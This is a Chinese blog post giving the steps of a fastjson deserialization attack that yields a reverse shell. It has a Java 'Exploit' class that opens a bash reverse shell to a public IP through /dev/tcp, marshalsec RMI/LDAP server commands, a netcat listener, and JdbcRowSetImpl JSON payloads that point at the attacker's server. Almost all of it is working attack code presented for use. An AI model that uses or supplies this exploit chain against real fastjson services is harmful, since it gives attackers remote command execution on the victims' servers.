zoukankan      html  css  js  c++  java
  • fastjson 反弹shell

    如下文章说得很不详细,只是用于记录我的步骤,初次利用的人,建议找别的博客文章学习。

    1. 准备一台公网服务器
      cd test
      python -m SimpleHTTPServer 8888

    2. javac Exploit.java
      里面的ip和端口改成你的

    import javax.naming.Context;
    import javax.naming.Name;
    import javax.naming.spi.ObjectFactory;
    import java.io.IOException;
    import java.util.Hashtable;
     
     
    public class Exploit{
        public Exploit() {}
     
        static
        {
            try {
                String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                        ? new String[]{"cmd.exe","/c", "calc.exe"}
                        : new String[]{"bash", "-c", "/bin/bash -i >& /dev/tcp/【公网IP】/7778 0>&1"};
                Runtime.getRuntime().exec(cmds);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
     
        public static void main(String[] args) {
            Exploit e = new Exploit();
            System.out.println("hello world");
        }
    }
    
    1. 上传到你的公网服务器
      Exploit.class
      marshalsec-0.0.3-SNAPSHOT-all.jar
    # 有2个协议
    RMI
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://【公网IP】/#Exploit 7776
    
    
    LDAP
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://【公网IP】/#Exploit 7776
    
    1. 接受反弹shell的地方
    nc -lvp 7778
    
    1. http请求
    # ldap
    {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://【公网IP】:7776/Exploit","autoCommit":true}}
    
    # rmi
    {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://【公网IP】:7776/Exploit","autoCommit":true}}
    
  • 相关阅读:
    提高github下载速度
    小程序兼容问题
    求斐波拉契数列第n位算法优化
    并发编程:ThreadLocal
    MySQL:常见面试题
    2.1语法基础_表达式目录树(EF底层原理的实现)
    ajax发送post请求:
    投资是普通人摆脱阶层固化的唯一靠谱方式
    人脸识别之Python基于OpenCV
    搜索算法“一二”基于VSCode平台C#语言
  • 原文地址:https://www.cnblogs.com/mysticbinary/p/12788019.html
Copyright © 2011-2022 走看看